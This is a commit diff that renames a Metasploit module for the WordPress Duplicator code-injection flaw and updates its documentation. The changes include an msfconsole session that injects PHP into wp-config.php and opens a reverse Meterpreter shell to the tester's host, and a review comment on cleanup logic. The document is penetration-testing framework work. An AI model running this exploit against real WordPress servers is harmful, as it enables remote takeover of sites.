renamed module and doc
parent
7e953e34b9
commit
b82e3469a2
|
@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
|
|||
|
||||
Confirm that functionality works:
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/multi/php/wordpress_duplicator`
|
||||
2. `use exploit/multi/php/wp_duplicator_code_inject`
|
||||
3. Set the `RHOST`.
|
||||
4. Confirm the target is vulnerable: `check`
|
||||
5. Confirm that the target is vulnerable: `The target is vulnerable.`
|
||||
|
@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
|
|||
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/php/wordpress_duplicator
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
|
||||
RHOSTS => 192.168.56.101
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
|
||||
LHOST => 192.168.56.1
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
|
||||
TARGETURI => /installer_vuln.php
|
||||
msf5 exploit(multi/php/wordpress_duplicator) > run
|
||||
msf5 > use exploit/multi/php/wp_duplicator_code_inject
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
|
||||
rhosts => 192.168.37.247
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
|
||||
targeturi => /wordpress/installer.php
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Checking if the wp-config.php file already exists...
|
||||
[*] This WordPress was not restored. Creating the wp-config.php file...
|
||||
[*] Successfully created the wp-config.php file!
|
||||
[*] All good! Injecting PHP code in the wp-config.php file...
|
||||
[*] Requesting wp-config.php to execute the payload...
|
||||
[*] Sending stage (37775 bytes) to 1.1.1.1
|
||||
[*] Sending stage (38247 bytes) to 192.168.37.247
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
|
||||
[*] Attempting to recreate wp-config file...
|
||||
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
|
||||
[*] Successfully created the wp-config.php file!
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : debian
|
||||
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-0FAJA14JLP4
|
||||
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
|
||||
Meterpreter : php/windows
|
||||
meterpreter >
|
||||
```
|
||||
|
|
@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type.eql? 'meterpreter'
|
||||
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
|
||||
client.fs.file.rm 'wp-config.php'
|
||||
if client.type.eql?('meterpreter')
|
||||
client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
|
||||
client.fs.file.rm('wp-config.php')
|
||||
else
|
||||
client.shell_command_token 'rm wp-config.php'
|
||||
client.shell_command_token('rm wp-config.php')
|
||||
end
|
||||
print_status("Attempting to recreate wp-config file...")
|
||||
create_wp_config_file
|
||||
end
|
||||
end
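Review bot: In the `else` branch of `on_new_session`, `client.shell_command_token('rm wp-config.php')` assumes a POSIX shell, while the scenario documented in this same commit shows a `php/windows` target. On such a host a plain shell session would presumably fail to delete the file, leaving the injected `wp-config.php` on the tested server. Neither removal call checks its result, and the relative path only works if the session's working directory is the directory that holds `wp-config.php`. A failed cleanup should be reported so the operator restores the file by hand, for example `print_warning('Could not remove wp-config.php; remove the injected file manually')`. A short comment above the `if` should say that the file is deleted because it carries the injected payload and is then recreated by `create_wp_config_file`.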
|